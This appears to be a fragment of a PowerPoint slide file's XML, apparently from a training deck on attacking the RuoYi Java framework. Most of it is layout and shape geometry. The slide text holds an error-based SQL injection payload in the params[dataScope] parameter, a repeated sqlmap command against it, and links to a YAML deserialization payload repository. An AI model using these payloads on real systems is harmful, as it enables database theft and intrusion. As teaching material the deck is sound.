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481" r:id="rId5"/>
    <p:sldId id="554" r:id="rId6"/>
    <p:sldId id="866" r:id="rId7"/>
    <p:sldId id="867" r:id="rId8"/>
    <p:sldId id="669" r:id="rId9"/>
    <p:sldId id="670" r:id="rId10"/>
    <p:sldId id="947" r:id="rId11"/>
    <p:sldId id="671" r:id="rId12"/>
    <p:sldId id="948" r:id="rId13"/>
    <p:sldId id="1009" r:id="rId14"/>
    <p:sldId id="1010" r:id="rId15"/>
    <p:sldId id="1011" r:id="rId16"/>
    <p:sldId id="1012" r:id="rId17"/>
    <p:sldId id="1013" r:id="rId18"/>
    <p:sldId id="1014" r:id="rId19"/>
    <p:sldId id="1015" r:id="rId20"/>
    <p:sldId id="1016" r:id="rId21"/>
    <p:sldId id="1017" r:id="rId22"/>
    <p:sldId id="1018" r:id="rId23"/>
    <p:sldId id="1019" r:id="rId24"/>
    <p:sldId id="1020" r:id="rId25"/>
    <p:sldId id="1021" r:id="rId26"/>
    <p:sldId id="1022" r:id="rId27"/>
    <p:sldId id="1032" r:id="rId28"/>
    <p:sldId id="1033" r:id="rId29"/>
    <p:sldId id="1023" r:id="rId30"/>
    <p:sldId id="1034" r:id="rId31"/>
    <p:sldId id="1029" r:id="rId32"/>
    <p:sldId id="1030" r:id="rId33"/>
    <p:sldId id="1031" r:id="rId34"/>
    <p:sldId id="672" r:id="rId35"/>
    <p:sldId id="1008" r:id="rId36"/>
    <p:sldId id="949" r:id="rId37"/>
    <p:sldId id="294" r:id="rId38"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId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熊仪_aYju7RJj" initials="熊" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="1" name="哒哒 熊猫" initials="哒哒" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="8" name="yifei" initials="y" lastIdx="1" clrIdx="7"/>
  <p:cmAuthor id="2" name="kingsoft" initials="k" lastIdx="1" clrIdx="1"/>
  <p:cmAuthor id="9" name="ADMIN" initials="A" lastIdx="1" clrIdx="8"/>
  <p:cmAuthor id="3" name="zhouzean" initials="z" lastIdx="1" clrIdx="2"/>
  <p:cmAuthor id="4" name="李鹏飞_6bQfzI3a" initials="李" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="5" name="李晓菲_MZFnUzi6" initials="李" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="6" name="小珞_QjMfU7FR" initials="小" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="2001" name="骆倩怡_Znauj26B" initials="authorId_382814100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A5A5A5"/>
    <a:srgbClr val="ED7D31"/>
    <a:srgbClr val="D9DADE"/>
    <a:srgbClr val="0162A7"/>
    <a:srgbClr val="005DAE"/>
    <a:srgbClr val="BC28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88731" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="114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tags" Target="tags/tag14.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthors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FD8DDD-29B3-4B15-844E-5C6F046154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8C6FC-2464-488C-91EF-93AF87FFD96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8C6FC-2464-488C-91EF-93AF87FFD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po</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>pageSize=&amp;pageNum=&amp;orderByColumn=&amp;isAsc=&amp;roleName=&amp;roleKey=&amp;status=&amp;params[beginTime]=&amp;params[endTime]=&amp;params[dataScope]=and extractvalue(1,concat(0x7e,(select table_schema from information_schema.tables where table_schema=database() limit 0,1),0x7e))</a:t>
            </a:r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8C6FC-2464-488C-91EF-93AF87FFD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sqlmap -r t1.txt --batch --technique=E -p params[dataScope] --dbms=mysql --random-agent --prefix=and</a:t>
            </a:r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sqlmap -r t1.txt --batch --technique=E -p params[dataScope] --dbms=mysql --random-agent --prefix=and</a:t>
            </a:r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sqlmap -r t1.txt --batch --technique=E -p params[dataScope] --dbms=mysql --random-agent --prefix=and</a:t>
            </a:r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sqlmap -r t1.txt --batch --technique=E -p params[dataScope] --dbms=mysql --random-agent --prefix=and</a:t>
            </a:r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https://doc.ruoyi.vip/ruoyi/document/htsc.html#%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1</a:t>
            </a:r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https://forum.butian.net/share/2796</a:t>
            </a:r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https://github.com/artsploit/yaml-payload</a:t>
            </a:r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https://github.com/artsploit/yaml-payload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latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://ruoyi.vip/</a:t>
            </a:r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https://github.com/artsploit/yaml-payload</a:t>
            </a:r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https://github.com/artsploit/yaml-payload</a:t>
            </a:r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8C6FC-2464-488C-91EF-93AF87FFD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latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://ruoyi.vip/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8C6FC-2464-488C-91EF-93AF87FFD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8C6FC-2464-488C-91EF-93AF87FFD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221615"/>
            <a:ext cx="8169910" cy="886460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="016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9650" y="392836"/>
            <a:ext cx="10515600" cy="576984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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11" name="KSO_Shape"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242635" y="467996"/>
            <a:ext cx="383120" cy="383120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 171957 w 576064"/>
              <a:gd name="connsiteY0" fmla="*/ 96048 h 576064"/>
              <a:gd name="connsiteX1" fmla="*/ 171957 w 576064"/>
              <a:gd name="connsiteY1" fmla="*/ 480016 h 576064"/>
              <a:gd name="connsiteX2" fmla="*/ 502964 w 576064"/>
              <a:gd name="connsiteY2" fmla="*/ 288032 h 576064"/>
              <a:gd name="connsiteX3" fmla="*/ 288032 w 576064"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 576064"/>
              <a:gd name="connsiteX4" fmla="*/ 576064 w 576064"/>
              <a:gd name="connsiteY4" fmla="*/ 288032 h 576064"/>
              <a:gd name="connsiteX5" fmla="*/ 288032 w 576064"/>
              <a:gd name="connsiteY5" fmla="*/ 576064 h 576064"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 576064"/>
              <a:gd name="connsiteY6" fmla="*/ 288032 h 576064"/>
              <a:gd name="connsiteX7" fmla="*/ 288032 w 576064"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 57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6064" h="576064">
                <a:moveTo>
                  <a:pt x="171957" y="96048"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="171957" y="480016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502964" y="288032"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="288032" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="447108" y="0"/>
                  <a:pt x="576064" y="128956"/>
                  <a:pt x="576064" y="288032"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="576064" y="447108"/>
                  <a:pt x="447108" y="576064"/>
                  <a:pt x="288032" y="576064"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128956" y="576064"/>
                  <a:pt x="0" y="447108"/>
                  <a:pt x="0" y="288032"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="128956"/>
                  <a:pt x="128956" y="0"/>
                  <a:pt x="28803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38" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10438130" y="430530"/>
            <a:ext cx="1409700" cy="479425"/>
            <a:chOff x="633" y="230"/>
            <a:chExt cx="1226" cy="417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Freeform 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1157" y="454"/>
              <a:ext cx="158" cy="167"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 31"/>
                <a:gd name="T1" fmla="*/ 13 h 32"/>
                <a:gd name="T2" fmla="*/ 0 w 31"/>
                <a:gd name="T3" fmla="*/ 19 h 32"/>
                <a:gd name="T4" fmla="*/ 17 w 31"/>
                <a:gd name="T5" fmla="*/ 32 h 32"/>
                <a:gd name="T6" fmla="*/ 31 w 31"/>
                <a:gd name="T7" fmla="*/ 32 h 32"/>
                <a:gd name="T8" fmla="*/ 31 w 31"/>
                <a:gd name="T9" fmla="*/ 26 h 32"/>
                <a:gd name="T10" fmla="*/ 18 w 31"/>
                <a:gd name="T11" fmla="*/ 26 h 32"/>
                <a:gd name="T12" fmla="*/ 9 w 31"/>
                <a:gd name="T13" fmla="*/ 19 h 32"/>
                <a:gd name="T14" fmla="*/ 9 w 31"/>
                <a:gd name="T15" fmla="*/ 13 h 32"/>
                <a:gd name="T16" fmla="*/ 18 w 31"/>
                <a:gd name="T17" fmla="*/ 6 h 32"/>
                <a:gd name="T18" fmla="*/ 31 w 31"/>
                <a:gd name="T19" fmla="*/ 6 h 32"/>
                <a:gd name="T20" fmla="*/ 31 w 31"/>
                <a:gd name="T21" fmla="*/ 0 h 32"/>
                <a:gd name="T22" fmla="*/ 17 w 31"/>
                <a:gd name="T23" fmla="*/ 0 h 32"/>
                <a:gd name="T24" fmla="*/ 0 w 31"/>
                <a:gd name="T25" fmla="*/ 1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32">
                  <a:moveTo>
                    <a:pt x="0" y="13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26"/>
                    <a:pt x="4" y="32"/>
                    <a:pt x="17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1" y="26"/>
                    <a:pt x="21" y="26"/>
                    <a:pt x="18" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="26"/>
                    <a:pt x="9" y="22"/>
                    <a:pt x="9" y="19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0"/>
                    <a:pt x="12" y="6"/>
                    <a:pt x="18" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="6"/>
                    <a:pt x="31" y="6"/>
                    <a:pt x="31" y="6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4" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1706" y="454"/>
              <a:ext cx="153" cy="167"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 17 w 30"/>
                <a:gd name="T1" fmla="*/ 6 h 32"/>
                <a:gd name="T2" fmla="*/ 30 w 30"/>
                <a:gd name="T3" fmla="*/ 6 h 32"/>
                <a:gd name="T4" fmla="*/ 30 w 30"/>
                <a:gd name="T5" fmla="*/ 0 h 32"/>
                <a:gd name="T6" fmla="*/ 17 w 30"/>
                <a:gd name="T7" fmla="*/ 0 h 32"/>
                <a:gd name="T8" fmla="*/ 0 w 30"/>
                <a:gd name="T9" fmla="*/ 13 h 32"/>
                <a:gd name="T10" fmla="*/ 0 w 30"/>
                <a:gd name="T11" fmla="*/ 19 h 32"/>
                <a:gd name="T12" fmla="*/ 17 w 30"/>
                <a:gd name="T13" fmla="*/ 32 h 32"/>
                <a:gd name="T14" fmla="*/ 30 w 30"/>
                <a:gd name="T15" fmla="*/ 32 h 32"/>
                <a:gd name="T16" fmla="*/ 30 w 30"/>
                <a:gd name="T17" fmla="*/ 26 h 32"/>
                <a:gd name="T18" fmla="*/ 17 w 30"/>
                <a:gd name="T19" fmla="*/ 26 h 32"/>
                <a:gd name="T20" fmla="*/ 8 w 30"/>
                <a:gd name="T21" fmla="*/ 19 h 32"/>
                <a:gd name="T22" fmla="*/ 8 w 30"/>
                <a:gd name="T23" fmla="*/ 13 h 32"/>
                <a:gd name="T24" fmla="*/ 17 w 30"/>
                <a:gd name="T25" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="17" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="6"/>
                    <a:pt x="30" y="6"/>
                    <a:pt x="30" y="6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" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0" y="13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6"/>
                    <a:pt x="3" y="32"/>
                    <a:pt x="17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21" y="26"/>
                    <a:pt x="17" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="26"/>
                    <a:pt x="8" y="22"/>
                    <a:pt x="8" y="19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0"/>
                    <a:pt x="11" y="6"/>
                    <a:pt x="17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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1335" y="454"/>
              <a:ext cx="168" cy="167"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 33"/>
                <a:gd name="T1" fmla="*/ 12 h 32"/>
                <a:gd name="T2" fmla="*/ 32 w 33"/>
                <a:gd name="T3" fmla="*/ 9 h 32"/>
                <a:gd name="T4" fmla="*/ 18 w 33"/>
                <a:gd name="T5" fmla="*/ 0 h 32"/>
                <a:gd name="T6" fmla="*/ 0 w 33"/>
                <a:gd name="T7" fmla="*/ 0 h 32"/>
                <a:gd name="T8" fmla="*/ 0 w 33"/>
                <a:gd name="T9" fmla="*/ 32 h 32"/>
                <a:gd name="T10" fmla="*/ 9 w 33"/>
                <a:gd name="T11" fmla="*/ 32 h 32"/>
                <a:gd name="T12" fmla="*/ 9 w 33"/>
                <a:gd name="T13" fmla="*/ 6 h 32"/>
                <a:gd name="T14" fmla="*/ 18 w 33"/>
                <a:gd name="T15" fmla="*/ 6 h 32"/>
                <a:gd name="T16" fmla="*/ 24 w 33"/>
                <a:gd name="T17" fmla="*/ 10 h 32"/>
                <a:gd name="T18" fmla="*/ 24 w 33"/>
                <a:gd name="T19" fmla="*/ 12 h 32"/>
                <a:gd name="T20" fmla="*/ 18 w 33"/>
                <a:gd name="T21" fmla="*/ 16 h 32"/>
                <a:gd name="T22" fmla="*/ 13 w 33"/>
                <a:gd name="T23" fmla="*/ 16 h 32"/>
                <a:gd name="T24" fmla="*/ 13 w 33"/>
                <a:gd name="T25" fmla="*/ 18 h 32"/>
                <a:gd name="T26" fmla="*/ 22 w 33"/>
                <a:gd name="T27" fmla="*/ 32 h 32"/>
                <a:gd name="T28" fmla="*/ 33 w 33"/>
                <a:gd name="T29" fmla="*/ 32 h 32"/>
                <a:gd name="T30" fmla="*/ 25 w 33"/>
                <a:gd name="T31" fmla="*/ 20 h 32"/>
                <a:gd name="T32" fmla="*/ 32 w 33"/>
                <a:gd name="T33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32">
                  <a:moveTo>
                    <a:pt x="32" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="9"/>
                    <a:pt x="32" y="9"/>
                    <a:pt x="32" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="5"/>
                    <a:pt x="30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23" y="6"/>
                    <a:pt x="24" y="8"/>
                    <a:pt x="24" y="10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3"/>
                    <a:pt x="23" y="16"/>
                    <a:pt x="18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31" y="19"/>
                    <a:pt x="32" y="16"/>
                    <a:pt x="32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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1523" y="454"/>
              <a:ext cx="168" cy="167"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 33"/>
                <a:gd name="T1" fmla="*/ 12 h 32"/>
                <a:gd name="T2" fmla="*/ 32 w 33"/>
                <a:gd name="T3" fmla="*/ 9 h 32"/>
                <a:gd name="T4" fmla="*/ 18 w 33"/>
                <a:gd name="T5" fmla="*/ 0 h 32"/>
                <a:gd name="T6" fmla="*/ 0 w 33"/>
                <a:gd name="T7" fmla="*/ 0 h 32"/>
                <a:gd name="T8" fmla="*/ 0 w 33"/>
                <a:gd name="T9" fmla="*/ 32 h 32"/>
                <a:gd name="T10" fmla="*/ 9 w 33"/>
                <a:gd name="T11" fmla="*/ 32 h 32"/>
                <a:gd name="T12" fmla="*/ 9 w 33"/>
                <a:gd name="T13" fmla="*/ 6 h 32"/>
                <a:gd name="T14" fmla="*/ 18 w 33"/>
                <a:gd name="T15" fmla="*/ 6 h 32"/>
                <a:gd name="T16" fmla="*/ 23 w 33"/>
                <a:gd name="T17" fmla="*/ 10 h 32"/>
                <a:gd name="T18" fmla="*/ 23 w 33"/>
                <a:gd name="T19" fmla="*/ 12 h 32"/>
                <a:gd name="T20" fmla="*/ 18 w 33"/>
                <a:gd name="T21" fmla="*/ 16 h 32"/>
                <a:gd name="T22" fmla="*/ 13 w 33"/>
                <a:gd name="T23" fmla="*/ 16 h 32"/>
                <a:gd name="T24" fmla="*/ 13 w 33"/>
                <a:gd name="T25" fmla="*/ 18 h 32"/>
                <a:gd name="T26" fmla="*/ 22 w 33"/>
                <a:gd name="T27" fmla="*/ 32 h 32"/>
                <a:gd name="T28" fmla="*/ 33 w 33"/>
                <a:gd name="T29" fmla="*/ 32 h 32"/>
                <a:gd name="T30" fmla="*/ 25 w 33"/>
                <a:gd name="T31" fmla="*/ 20 h 32"/>
                <a:gd name="T32" fmla="*/ 32 w 33"/>
                <a:gd name="T33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32">
                  <a:moveTo>
                    <a:pt x="32" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="9"/>
                    <a:pt x="32" y="9"/>
                    <a:pt x="32" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="5"/>
                    <a:pt x="30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23" y="6"/>
                    <a:pt x="23" y="8"/>
                    <a:pt x="23" y="1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3"/>
                    <a:pt x="23" y="16"/>
                    <a:pt x="18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30" y="19"/>
                    <a:pt x="32" y="16"/>
                    <a:pt x="32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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="729" y="417"/>
              <a:ext cx="77" cy="47"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 15"/>
                <a:gd name="T1" fmla="*/ 0 h 9"/>
                <a:gd name="T2" fmla="*/ 0 w 15"/>
                <a:gd name="T3" fmla="*/ 1 h 9"/>
                <a:gd name="T4" fmla="*/ 0 w 15"/>
                <a:gd name="T5" fmla="*/ 8 h 9"/>
                <a:gd name="T6" fmla="*/ 2 w 15"/>
                <a:gd name="T7" fmla="*/ 9 h 9"/>
                <a:gd name="T8" fmla="*/ 15 w 15"/>
                <a:gd name="T9" fmla="*/ 9 h 9"/>
                <a:gd name="T10" fmla="*/ 15 w 15"/>
                <a:gd name="T11" fmla="*/ 0 h 9"/>
                <a:gd name="T12" fmla="*/ 2 w 15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9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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="862" y="417"/>
              <a:ext cx="71" cy="47"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 13 w 14"/>
                <a:gd name="T1" fmla="*/ 0 h 9"/>
                <a:gd name="T2" fmla="*/ 14 w 14"/>
                <a:gd name="T3" fmla="*/ 1 h 9"/>
                <a:gd name="T4" fmla="*/ 14 w 14"/>
                <a:gd name="T5" fmla="*/ 8 h 9"/>
                <a:gd name="T6" fmla="*/ 13 w 14"/>
                <a:gd name="T7" fmla="*/ 9 h 9"/>
                <a:gd name="T8" fmla="*/ 0 w 14"/>
                <a:gd name="T9" fmla="*/ 9 h 9"/>
                <a:gd name="T10" fmla="*/ 0 w 14"/>
                <a:gd name="T11" fmla="*/ 0 h 9"/>
                <a:gd name="T12" fmla="*/ 13 w 1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">
                  <a:moveTo>
                    <a:pt x="13" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="14" y="0"/>
                    <a:pt x="14" y="1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9"/>
                    <a:pt x="13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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="633" y="334"/>
              <a:ext cx="173" cy="214"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 11 w 34"/>
                <a:gd name="T1" fmla="*/ 12 h 41"/>
                <a:gd name="T2" fmla="*/ 15 w 34"/>
                <a:gd name="T3" fmla="*/ 8 h 41"/>
                <a:gd name="T4" fmla="*/ 34 w 34"/>
                <a:gd name="T5" fmla="*/ 8 h 41"/>
                <a:gd name="T6" fmla="*/ 34 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 41"/>
                <a:gd name="T8" fmla="*/ 12 w 34"/>
                <a:gd name="T9" fmla="*/ 0 h 41"/>
                <a:gd name="T10" fmla="*/ 0 w 34"/>
                <a:gd name="T11" fmla="*/ 11 h 41"/>
                <a:gd name="T12" fmla="*/ 0 w 34"/>
                <a:gd name="T13" fmla="*/ 30 h 41"/>
                <a:gd name="T14" fmla="*/ 12 w 34"/>
                <a:gd name="T15" fmla="*/ 41 h 41"/>
                <a:gd name="T16" fmla="*/ 34 w 34"/>
                <a:gd name="T17" fmla="*/ 41 h 41"/>
                <a:gd name="T18" fmla="*/ 34 w 34"/>
                <a:gd name="T19" fmla="*/ 32 h 41"/>
                <a:gd name="T20" fmla="*/ 15 w 34"/>
                <a:gd name="T21" fmla="*/ 32 h 41"/>
                <a:gd name="T22" fmla="*/ 11 w 34"/>
                <a:gd name="T23" fmla="*/ 28 h 41"/>
                <a:gd name="T24" fmla="*/ 11 w 34"/>
                <a:gd name="T25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41">
                  <a:moveTo>
                    <a:pt x="11" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="10"/>
                    <a:pt x="13" y="8"/>
                    <a:pt x="15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6"/>
                    <a:pt x="5" y="41"/>
                    <a:pt x="12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3" y="32"/>
                    <a:pt x="11" y="31"/>
                    <a:pt x="11" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11" y="12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2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="862" y="334"/>
              <a:ext cx="168" cy="214"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 23 w 33"/>
                <a:gd name="T1" fmla="*/ 12 h 41"/>
                <a:gd name="T2" fmla="*/ 19 w 33"/>
                <a:gd name="T3" fmla="*/ 8 h 41"/>
                <a:gd name="T4" fmla="*/ 0 w 33"/>
                <a:gd name="T5" fmla="*/ 8 h 41"/>
                <a:gd name="T6" fmla="*/ 0 w 33"/>
                <a:gd name="T7" fmla="*/ 0 h 41"/>
                <a:gd name="T8" fmla="*/ 22 w 33"/>
                <a:gd name="T9" fmla="*/ 0 h 41"/>
                <a:gd name="T10" fmla="*/ 33 w 33"/>
                <a:gd name="T11" fmla="*/ 11 h 41"/>
                <a:gd name="T12" fmla="*/ 33 w 33"/>
                <a:gd name="T13" fmla="*/ 30 h 41"/>
                <a:gd name="T14" fmla="*/ 22 w 33"/>
                <a:gd name="T15" fmla="*/ 41 h 41"/>
                <a:gd name="T16" fmla="*/ 0 w 33"/>
                <a:gd name="T17" fmla="*/ 41 h 41"/>
                <a:gd name="T18" fmla="*/ 0 w 33"/>
                <a:gd name="T19" fmla="*/ 32 h 41"/>
                <a:gd name="T20" fmla="*/ 19 w 33"/>
                <a:gd name="T21" fmla="*/ 32 h 41"/>
                <a:gd name="T22" fmla="*/ 23 w 33"/>
                <a:gd name="T23" fmla="*/ 28 h 41"/>
                <a:gd name="T24" fmla="*/ 23 w 33"/>
                <a:gd name="T25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41">
                  <a:moveTo>
                    <a:pt x="23" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="10"/>
                    <a:pt x="21" y="8"/>
                    <a:pt x="19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9" y="0"/>
                    <a:pt x="33" y="5"/>
                    <a:pt x="33" y="1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6"/>
                    <a:pt x="28" y="41"/>
                    <a:pt x="22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1" y="32"/>
                    <a:pt x="23" y="31"/>
                    <a:pt x="23" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="23" y="12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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="633" y="230"/>
              <a:ext cx="402" cy="78"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 229 w 402"/>
                <a:gd name="T1" fmla="*/ 31 h 78"/>
                <a:gd name="T2" fmla="*/ 229 w 402"/>
                <a:gd name="T3" fmla="*/ 0 h 78"/>
                <a:gd name="T4" fmla="*/ 173 w 402"/>
                <a:gd name="T5" fmla="*/ 0 h 78"/>
                <a:gd name="T6" fmla="*/ 173 w 402"/>
                <a:gd name="T7" fmla="*/ 31 h 78"/>
                <a:gd name="T8" fmla="*/ 0 w 402"/>
                <a:gd name="T9" fmla="*/ 31 h 78"/>
                <a:gd name="T10" fmla="*/ 0 w 402"/>
                <a:gd name="T11" fmla="*/ 78 h 78"/>
                <a:gd name="T12" fmla="*/ 402 w 402"/>
                <a:gd name="T13" fmla="*/ 78 h 78"/>
                <a:gd name="T14" fmla="*/ 402 w 402"/>
                <a:gd name="T15" fmla="*/ 31 h 78"/>
                <a:gd name="T16" fmla="*/ 229 w 402"/>
                <a:gd name="T17" fmla="*/ 3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2" h="78">
                  <a:moveTo>
                    <a:pt x="229" y="31"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="229" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229" y="31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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="633" y="574"/>
              <a:ext cx="402" cy="73"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 229 w 402"/>
                <a:gd name="T1" fmla="*/ 47 h 73"/>
                <a:gd name="T2" fmla="*/ 229 w 402"/>
                <a:gd name="T3" fmla="*/ 73 h 73"/>
                <a:gd name="T4" fmla="*/ 173 w 402"/>
                <a:gd name="T5" fmla="*/ 73 h 73"/>
                <a:gd name="T6" fmla="*/ 173 w 402"/>
                <a:gd name="T7" fmla="*/ 47 h 73"/>
                <a:gd name="T8" fmla="*/ 0 w 402"/>
                <a:gd name="T9" fmla="*/ 47 h 73"/>
                <a:gd name="T10" fmla="*/ 0 w 402"/>
                <a:gd name="T11" fmla="*/ 0 h 73"/>
                <a:gd name="T12" fmla="*/ 402 w 402"/>
                <a:gd name="T13" fmla="*/ 0 h 73"/>
                <a:gd name="T14" fmla="*/ 402 w 402"/>
                <a:gd name="T15" fmla="*/ 47 h 73"/>
                <a:gd name="T16" fmla="*/ 229 w 402"/>
                <a:gd name="T17" fmla="*/ 4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2" h="73">
                  <a:moveTo>
                    <a:pt x="229" y="47"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="229" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173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402" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229" y="47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5"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1157" y="261"/>
              <a:ext cx="152" cy="151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 26 w 30"/>
                <a:gd name="T1" fmla="*/ 5 h 29"/>
                <a:gd name="T2" fmla="*/ 17 w 30"/>
                <a:gd name="T3" fmla="*/ 5 h 29"/>
                <a:gd name="T4" fmla="*/ 17 w 30"/>
